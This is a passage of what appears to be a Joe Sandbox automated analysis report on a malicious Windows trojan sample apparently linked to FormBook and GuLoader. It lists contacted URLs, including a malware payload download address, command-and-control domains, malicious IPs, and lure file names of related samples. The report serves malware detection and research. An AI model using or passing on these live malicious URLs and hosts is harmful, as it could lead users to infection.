https://www.msn.com/de-de/sport/fussball/uefa-champions-league	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	wLlREXsA9M.exe	false		high
http://www.tchyhg.com/ms14/www.wshaizapp.site	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lojaasoriginais.online/ms14/www.aniwatch.top	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000004.00000002.5864588777.000000000CA35000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA35000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.zbjcolwy.cfd	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qwevqgjw.cfd/ms14/www.lasik-de-de-8808230.zone	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cacciatoridiofferte.comReferer:	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-de/nachrichten/other/faschismus-in-s	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	wLlREXsA9M.exe	false		high
https://www.msn.com/de-de/finanzen/aktiendetails/earnings/fi-a1sjw7?noti=EarningRelease	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/de-de/finanzen/top-stories/agentur-fitch-entzieht-usa-top-kreditrating/ar-AA1eEE	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/de-de/reisen/artikel/so-gro	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/de-de/gesundheit/medizinisch/forschende-warnen-ein-beliebtes-lebensmittel-soll-d	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://android.notify.windows.com/iOS	explorer.exe, 00000004.00000003.2597061412.000000000D17B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1623040856.000000000D17B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000D17B000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Condition/MostlyCloudyDay.svg	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.nihil.oneReferer:	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000004.00000002.5864588777.000000000CA35000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA35000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.clasmiv.xyz/ms14/	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.msn.com/de-de/nachrichten/panorama/schrecklicher-fund-in-alaska-kajakfahrer-filmte-wohl-	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.lasik-de-de-8808230.zone/ms14/www.qhrxnxoe.cfd	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-de/video/nachrichten/vom-handy-abgelenkt-rolltreppe-bleibt-stehen-frau-bemerk	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?activityId=0013712877CD4FA3A5007AAAB9D108D2&timeOut=5000&oc	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.nihil.one/ms14/	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lilith-con.com/ms14/www.civzbpp.xyz	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000004.00000002.5864588777.000000000CA35000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CA35000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/de-de/wetter/topgeschichten/irres-wetter-wintersturm-n	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.pgtjirqx.cfd/ms14/	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.m	explorer.exe, 00000004.00000003.2618208073.0000000010F8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2599670367.0000000010F8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2633107162.0000000010FA4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://198.46.176.189/	wLlREXsA9M.exe, 00000003.00000002.1077566633.00000000025A5000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.975376013.00000000025A7000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.974811648.00000000025A7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.duffledash.com/ms14/(	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cacciatoridiofferte.com	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-de/finanzen/aktiendetails/earnings/fi-a1nhlh?noti=EarningRelease	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://198.46.176.189/windows/kHjzvgNVUFKkek92.bin.	wLlREXsA9M.exe, 00000003.00000002.1077566633.0000000002585000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.qhrxnxoe.cfd	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tchyhg.com/ms14/	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.com:	explorer.exe, 00000004.00000003.2628769436.000000000CFED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1623040856.000000000CFC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2632193696.000000000CFF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5871402370.000000000CFF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CF9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2597061412.000000000CFD8000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.14	www.ypasbfxplu.shop	European Union	13335	CLOUDFLARENETUS	true
198.252.102.187	venria.store	Canada	20068	HAWKHOSTCA	true
52.76.96.91	dwerweima01.cn	United States	16509	AMAZON-02US	true
107.148.83.209	www.zbjcolwy.cfd	United States	54600	PEGTECHINCUS	true
67.27.158.126	unknown	United States	202818	LEVEL3COMMUNICATIONSFR	false
185.238.87.6	lilith-con.com	Spain	209984	WIBERES	true
107.148.132.46	www.qhrxnxoe.cfd	United States	18013	ASLINE-AS-APASLINELIMITEDHK	true
23.227.38.65	lojaasoriginais.online	Canada	13335	CLOUDFLARENETUS	true
199.59.243.224	www.aniwatch.top	United States	395082	BODIS-NJUS	true
8.212.100.103	xqw1666688.top	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
104.17.157.1	ssl1.prod.systemdragon.com	United States	13335	CLOUDFLARENETUS	true
195.110.124.133	cacciatoridiofferte.com	Italy	39729	REGISTER-ASIT	true
118.27.130.228	www.peterscanner.com	Singapore	135161	GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG	true
38.53.14.66	www.genqaagz.cfd	United States	174	COGENT-174US	true
199.188.104.120	www.qwevqgjw.cfd	United States	54600	PEGTECHINCUS	true
198.46.176.189	unknown	United States	36352	AS-COLOCROSSINGUS	true
34.102.136.180	duffledash.com	United States	15169	GOOGLEUS	false
45.77.219.226	www.nihil.one	United States	20473	AS-CHOOPAUS	true
38.53.14.151	www.pgtjirqx.cfd	United States	174	COGENT-174US	true

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1284625
Start date and time:	2023-08-02 20:33:02 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	wLlREXsA9M.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/4@22/19
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 29% (good quality ratio 27.1%) Quality average: 73.6% Quality standard deviation: 29.6%
HCA Information:	Successful, ratio: 88% Number of executed functions: 59 Number of non-executed functions: 271
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.190.177.82, 20.190.177.147, 20.190.177.19, 20.190.177.83, 20.190.177.84, 20.190.177.148, 20.190.177.146, 20.190.177.23
Excluded domains from analysis (whitelisted): www.bing.com, spclient.wg.spotify.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, arc.msn.com, 2.tlu.dl.delivery.mp.microsoft.com, login.msa.msidentity.com, login.live.com, evoke-windowsservices-tas.msedge.net, storeedgefd.dsx.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.14	ORDER_NO_21.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.naturabeauteja.com/i9u8/?uoAi-=TosVEMZ2bz7p8ZrAbgwLAJijnNoB8C3L9TFQbGR3QtSX3XcIsTzf0qHfISYfwqnyVaBIvQgj/lSRyJuoJOgP8bLVWWnegIfcVQ==&9jOMd7=Rqlt
	DEKONT#9890901.exe	Get hash	malicious	GuLoader	Browse	mcoaz.shop/DXO341/index.php
	Artwork01.exe	Get hash	malicious	GuLoader	Browse	csbo1.shop/CB341/index.php
	RFQ TWM 459077.com	Get hash	malicious	FormBook, GuLoader	Browse	www.suzheng22.top/kpkr/?DNdTU2aX=KgL5c9A1Q8FemJpnpTqnlthaR09urory7kjFbfW6FfOK4PiSG0ztI+qLk4hibH+JaNx66N4O2psfvb3hgLlq0oFg4JsmpVsTqQ==&WL4zs=8eY-Extx56biIb
	RFQ_TWM_459077.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.mjsink.com/kpkr/?Ndw85q8=LNnphtBoG0xmIHkjG/OZZU27VV7gor4I3b/VZk6GpE16qUjsW01ntA1aZPfjqailHPGV/n0giu4NtlwN4d/m2kxhK9qAz3tYjw==&b4=Yh0XJ6kyRIh
	rekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.bhai11book.com/mn82/?t4KP62L=GgBubHLK34j6jcRPEpSKyU20vQojHqXoszICjmCk42byRSrCJOdWlKpxJ6YvIYZXBLWk&5j-xt=7nOxwVJ
	dutch_94854_0293_invoice_30495.exe	Get hash	malicious	FormBook	Browse	www.otopodlogi.com/4pbr/?-K3Cy=bivDzi&ftVIcRD=Y9r1v2qwugU76S6k+ZDI2i51Mm0fp3xStCZ2uPxGBRyw0HEEArTF8uIOlxe2l5w4pyo9iiYDkNAgOAcXMhemS7a+INRtt+7yEQ==
	WpPPx8yVOV.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.juanaraleighty.cyou/qmu9/?oYP_Ut=WdzrrsCoUQS7vG7GKQTjTYj+Vzeocn0yXLKV2mNdz/bgFlWe+N4RkwVV+a/HyPXejoGtFc192CBxqTxKDVJwAFrKe+3AcNw8PA==&PEDKLK=7ZAzKb4oFyVRt-
	proforma pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.alyfu.cfd/gqog/?k0DHc8=4hJPfV2&2d=fjQBhafQmkCy6ivjFcbG5UeMOb+/CME6rtbxZ45vWBRRgBfpAXZYGQogkgshkTKyc/2u4QAGDovXLgdLVUVukZqdLfsHxBNPQA==
	Feoml1f5Wl.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.elpediodico.com/qkwl/?-ZQ=CPXGpxCeaYM9D5LbnopPpnIV8hWUxuODPfOvRx0Pbbkby67G4V0tL7sn1Kx97PgSS7jjSqROn4pWpIGU27buFXI5GrruKE/W4g==&7nJP=fZI8X8G
	ML_005446-pdf.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.partnermdg.com/q9dv/?6lvLp05=TEELfb1L1rRSYPdfqC0FCiYiSJsZqoA5TN8p4m44hRuudVsMhkozA2334SPdD1rc75Rr/lxSQC7uYfGJWMggAju2/0PFOKHbSA==&o2Jpa=8pPdDl1Pfd58
	SecuriteInfo.com.Gen.Variant.Nemesis.10195.14623.exe	Get hash	malicious	Azorult, GuLoader, PrivateLoader	Browse	zconnect.shop/PL341/index.php
	Specifications & Xrawings_newpdf.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.elpediodico.com/qkwl/?a4I=CPXGpxCeaYM9D5LbnopPpnIV8hWUxuODPfOvRx0Pbbkby67G4V0tL7sn1Kx97PgSS7jjSqROn4pWpIGU27buFXI5GrruKE/W4g==&1bfLE=TbuDZXDpaN786J7
	Eskadrechefen.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.tiktokmall.info/bjtd/?mnxxAf=d4hyF9fxbfnLmjxgoJyfuNfFLFqTdRHBwbaNc9KWalqvXkN5nupeYJkRg0yxDhmtTy6G&7n=QDHHQJz
	SWIFT MT103.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.elpediodico.com/qkwl/?B8C=CPXGpxCeaYM9D5LbnopPpnIV8hWUxuODPfOvRx0Pbbkby67G4V0tL7sn1Kx97PgSS7jjSqROn4pWpIGU27buFXI5GrruKE/W4g==&j0=5jrp
	Purchase Order Pricelist & Samples.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.elpediodico.com/qkwl/?U8KPq0zH=CPXGpxCeaYM9D5LbnopPpnIV8hWUxuODPfOvRx0Pbbkby67G4V0tL7sn1Kx97PgSS7jjSqROn4pWpIGU27buFXI5GrruKE/W4g==&tBZ0QJ=5jiTxpNh9l
	Original Bill of Lading, Packing List and Commercial Invoice .vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.elpediodico.com/qkwl/?Mr=CPXGpxCeaYM9D5LbnopPpnIV8hWUxuODPfOvRx0Pbbkby67G4V0tL7sn1Kx97PgSS7jjSqROn4pWpIGU27buFXI5GrruKE/W4g==&pP=v6Ad
	Swift.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.tclwinthb.com/c3mu/?wHFx=zHeyKQ5h/BgpmG3ovuAAC5LBUG6U+bN2sIhuS6fQQh2TxBlLfQWCUEnh2IUBeF69WDK1lwodXVfz4nKih3FtsujLHS/Px5zGBA==&3fut=6l9p4xLpHDmDgZgp
	INQUIRYORDER.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.horsecamelsuppliments.com/l84r/?m2J=dcOxMts0kg4phJ0Yj22q2uXwAlFeMqiLGZDx4kXyNsIMnD3OQq4suElEuByUppEBiJ8QUwWTaWkHvDaSfQGxVwr4GiGVDHR8ng==&MHw=PXVh
	ussfe3.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.xn--k2ei1aglq2a9bxvhbr5j2a.com/jb25/?oxo4n=9mlC6B6/52FMv6odHRVAk8UpvYIbKfUq/T/01FkuDc9yEiMSbGozqMyrF/ncsG8+yS0y&FVVXtP=x8rh

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.ypasbfxplu.shop	CBaxoveJtw.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.114.96.3
www.nihil.one	CBaxoveJtw.exe	Get hash	malicious	FormBook, GuLoader	Browse	45.77.219.226
www.aniwatch.top	CBaxoveJtw.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.224
www.peterscanner.com	3P5Ti2p4Xj.exe	Get hash	malicious	FormBook, GuLoader	Browse	118.27.130.228
www.peterscanner.com	sOjxIU25DP.exe	Get hash	malicious	FormBook, GuLoader	Browse	118.27.130.228

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Outstanding _ Inv 0998068898953-AM_NS_MG_pdf.msg	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	https://bafkreicciufmkfdleqs4mqplriowxhvhvfkrdkyxdcv7g6dokngt4hanay.ipfs.dweb.link	Get hash	malicious	HTMLPhisher	Browse	188.114.96.7
	http://sites.google.com/view/welcome-to-open-minds/home	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	http://www.4alltak3.com/superimposed-Eccles/3966zFI2395VU86t11HbVf7Zt4dfZ28AHsr8D_u4IIr-6IwxfhDtvsFEsvZ6idFndd6H1hut05bJi1b	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://app.donorview.com/Communication/Click?p?h=HwOLjtfiW2yHAKsD1stCKxBj7FkaC&activityId=10248378&target=https%3A%2F%2Fsyriaig.net%2Fscallerings%2F4OLg%2Fp1Oyhs%2FbGlzYS5qb25lc0BtZHJjLm9yZw==	Get hash	malicious	Unknown	Browse	104.16.123.96
	ORDEM_DE_COMPRA.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	https://indd.adobe.com/view/493596a8-da0a-4222-861a-9698c19b826c	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Request_for_Quotation.xlam.xlsx	Get hash	malicious	Unknown	Browse	104.18.115.97
	crnp collaborative agreement in pennsylvania 78103.js	Get hash	malicious	Unknown	Browse	104.18.8.249
	crnp collaborative agreement in pennsylvania 78103.js	Get hash	malicious	Unknown	Browse	104.18.9.249
	FEAVAsyxva.exe	Get hash	malicious	FormBook	Browse	104.21.35.240
	MS Document.html	Get hash	malicious	Phisher	Browse	104.16.123.96
	euCAWf25FG.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.114.97.3
	https://kgkagkgaga.ws	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://nuwaveqrp.com	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://doc.clickup.com/9002176627/p/h/8c94m3k-464/d8d5dde625a313d	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
